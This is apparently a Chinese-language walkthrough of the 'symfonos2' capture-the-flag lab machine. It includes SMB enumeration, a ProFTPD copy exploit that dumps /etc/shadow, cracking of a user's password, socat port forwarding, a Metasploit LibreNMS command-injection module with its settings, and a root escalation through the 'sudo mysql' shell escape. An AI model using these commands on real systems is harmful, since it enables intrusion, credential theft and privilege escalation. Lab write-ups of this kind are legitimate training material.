nmap 扫描一下端口
访问 80 端口有个图片(1920*1080 的还可以用来做壁纸)
nmap 扫出来的里面有个 ftp,访问需要验证身份
还有个 smb,通过 smbclient 连接一下:smbclient //192.168.149.180/anonymous
密码那里直接回车就行
把里面的 log.txt 下到本地,然后查看一下,没发现 password 相关的,找到一个 user:aeolus
另外可以看一下 log.txt 第一行的内容
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
用这个脚本,拷贝一下
https://github.com/chcx/cpx_proftpd/
然后 get 下来
看看 shadow,从这里面获得了用户的密码 hash
爆破一下,很快就能被跑出一个 aeolus:sergioteamo
用这个登录 ssh 成功
nmap 扫一下自己,发现有个 8080 口是开这个,但是只能本地访问
socat -d TCP-LISTEN:6666,fork,reuseaddr tcp:127.0.0.1:8080
然后本地访问就行了,火狐可能会禁止访问
此网址使用了一个通常用于网络浏览以外目的的端口。出于安全原因,Firefox 取消了该请求。
在火狐访问 about:config 然后新建一个
首选项名称:
network.security.ports.banned.override
值:
0-65535
就可以访问了
用 msf 的 linux/http/librenms_addhost_cmd_inject 进行攻击
set rhosts 192.168.149.180
set rport 6666
set username aeolus
set password sergioteamo
set lhost 192.168.149.180
这时候 sudo -l 可以发现 mysql 是可以不需要密码就能 sudo 运行的
可以在这里面找 https://gtfobins.github.iomysql -e '\! /bin/sh'
